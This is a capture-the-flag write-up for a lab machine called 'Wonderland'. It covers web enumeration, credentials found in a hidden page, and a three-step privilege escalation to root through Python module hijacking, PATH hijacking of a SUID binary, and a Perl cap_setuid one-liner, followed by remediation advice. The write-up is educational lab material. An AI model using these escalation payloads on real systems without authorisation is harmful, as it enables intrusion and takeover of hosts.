Target IP: 10.48.137.121 Difficulty: Medium Objective: User (user.txt) & Root (root.txt)

1. Executive Summary

“Wonderland” is a Linux machine that requires a multi-stage privilege escalation path. Initial access is obtained by discovering hidden directories (/r/a/b/b/i/t) containing credentials. The path to root involves three distinct lateral movement and escalation techniques: Python Module Hijacking (abusing import priority), PATH Variable Hijacking (abusing relative binary calls in SUID executables), and Linux Capability Abuse (exploiting setuid capabilities on the Perl binary).

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Directory Fuzzing.
  • T1078 (Valid Accounts): SSH Credential Reuse.
  • T1574.008 (Hijack Execution Flow: Path Interception): Python import hijacking and Linux PATH manipulation.
  • T1548.001 (Setuid and Setgid): Exploiting capabilities (getcap).

2. Enumeration

A. Network Scanning

  • 22/tcp (SSH): OpenSSH 7.6p1.
  • 80/tcp (HTTP): Golang HTTP Server.

B. Web Enumeration

  1. Directory Discovery: The site directs you to “Follow the White Rabbit.”
  • Manual or recursive discovery reveals the directory structure: /r/a/b/b/i/t.
  1. Credential Discovery:
  • Checking the source code or the page at the end of the directory chain reveals credentials for alice:
  • User: alice
  • Password: HowDothTheLittleCrocodileImproveHisShiningTail

3. Privilege Escalation Chain

Step 1: Alice → Rabbit (Python Module Hijacking)

Analysis: The user alice can run a python script as rabbit via sudo: sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py.

The script contains the line import random.

The Exploit: Python searches for modules in the Current Working Directory (CWD) before checking the standard library paths. By creating a file named random.py in the same directory as the script (/home/alice), we force Python to load our malicious code instead of the real random module.

  1. Create Payload:
# /home/alice/random.py
import os
os.system("/bin/bash")
  1. Execute:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Status: User rabbit.


Step 2: Rabbit → Hatter (PATH Hijacking)

Analysis: The user rabbit has a SUID binary teaParty. Running strings or ltrace on it reveals it calls the date command without an absolute path (e.g., it calls date instead of /bin/date).

The Exploit: When a command is called without a full path, the shell searches the directories listed in the $PATH variable from left to right. We can insert our current directory at the start of the PATH variable so the shell finds our malicious date script before the real one.

  1. Create Payload:
# /home/rabbit/date
#!/bin/sh
/bin/bash

(Remember to chmod +x date). 2. Manipulate PATH:

export PATH=/home/rabbit:$PATH
  1. Execute:
./teaParty

Status: User hatter.


Step 3: Hatter → Root (Capability Abuse)

Analysis: Enumeration (using linpeas or manual checking) reveals a binary with empty capabilities.

getcap -r / 2>/dev/null
# /usr/bin/perl = cap_setuid+ep

The Exploit: Linux Capabilities break down the “all-powerful” root privilege into distinct units. cap_setuid+ep allows the perl binary to change its User ID (UID) to any other user, including root (UID 0), without needing standard SUID permissions.

  1. Execute:
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

Status: root.


4. Remediation (Blue Team)

  1. Python Script Security:
  • Avoid running scripts from user-writable directories via sudo.
  • Use absolute imports or restrict PYTHONPATH.
  1. Binary Security (SUID):
  • Always use absolute paths (e.g., /bin/date) inside compiled binaries when calling system commands.
  • Sanitize the environment variables within the binary to ignore the user’s $PATH.
  1. Capabilities:
  • Regularly audit capabilities using getcap.
  • Remove dangerous capabilities like cap_setuid from interpreters like perl, python, or tar unless strictly necessary.